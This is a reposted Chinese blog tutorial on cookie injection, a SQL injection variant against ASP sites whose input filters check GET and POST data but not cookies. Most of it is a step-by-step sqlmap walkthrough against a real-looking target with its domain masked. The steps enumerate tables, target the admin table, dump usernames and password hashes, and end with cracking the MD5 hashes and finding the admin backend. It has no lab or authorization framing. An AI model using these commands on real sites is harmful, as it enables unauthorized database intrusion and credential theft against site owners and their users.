博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
cookie注入
阅读量:6683 次
发布时间:2019-06-25

本文共 997 字,大约阅读时间需要 3 分钟。

我先说一下什么是cookies注入,如果你学过ASP,你应该知道Request.QueryString(get)或Requset.FORM)(POST)

这就是我们读取用户发给WEB服务器的指定键的值!

有时我们为了简化代码,会写成

ID=Request("ID")

这样写法是简单,但是问题就来了

cookie注入利用的环境

我们知道WEB服务是怎样读取数据的,他是先GET中的数据,没有再取POST中的数据,还回去取cookies中的数据

我们再看看房主入系统,她会检测GET和POST中的数据。如果有特殊字符(‘   and   order by)禁止数据的提交,比如下图所示:

但是它并没有检测cookies中的数据,所以我们就可以对这个网站发动攻击。

可以看到ID=205,所以我们可以用sqlmap对这个网站发动攻击.

1:首先打开sqlmap,需要声明一点,在sqlmap中使用cookie注入,level >=2才行

输入命令:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2

检测到此url含有注入点,再来!

2:sqlmap.py -u " http://www.***.com/shownews.asp" --cookie="id=207" --level 2  --tables   获取数据库中的所有表

3:接下来对这个admin进行检测sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin --column

4:然后对这个username和password进行爆破

sqlmap.py -u "http://www.***.com/shownews.asp" --cookie="id=205" --level 2 --tables -T admin -C username,password --dump

5:爆出来后密码是用md5形式加密的,所以拿到相应的网站解密就可以了。然后就是找后台就可以了;

结束!

本文转自 towardly 51CTO博客,原文链接:http://blog.51cto.com/brighttime/1918560

转载地址:http://zmaao.baihongyu.com/

你可能感兴趣的文章
酒有两不喝,财有两不发,忙有三不帮,亲有三不走!
查看>>
IPFS 服务的Python访问
查看>>
DllMain详解
查看>>
Class bytes found but defineClass()failed for error when deploying EAR
查看>>
IIS7.0安装的FTP建账号
查看>>
spring --理解
查看>>
前台中文数据后台achieveRequest().getParameter获取乱码问题
查看>>
sed工具扩展学习
查看>>
db4o 参考资料
查看>>
mysql生产环境___主从同步修复案例
查看>>
对Controller的单元测试
查看>>
人工智能无法挑战人心
查看>>
移动web 1px边框解决方案
查看>>
centos7.4 Rsync配置和触发备份
查看>>
Oracle12c 安装
查看>>
DX11之D3DXMatrixIdentity 函数
查看>>
四项重要标准 让金融机构评选合适的DDoS防护提供商
查看>>
iOS开发的插件和工具
查看>>
设置UIButton,UITextFild边框圆角(上半边或下半边)
查看>>
Python __init__.py 文件使用
查看>>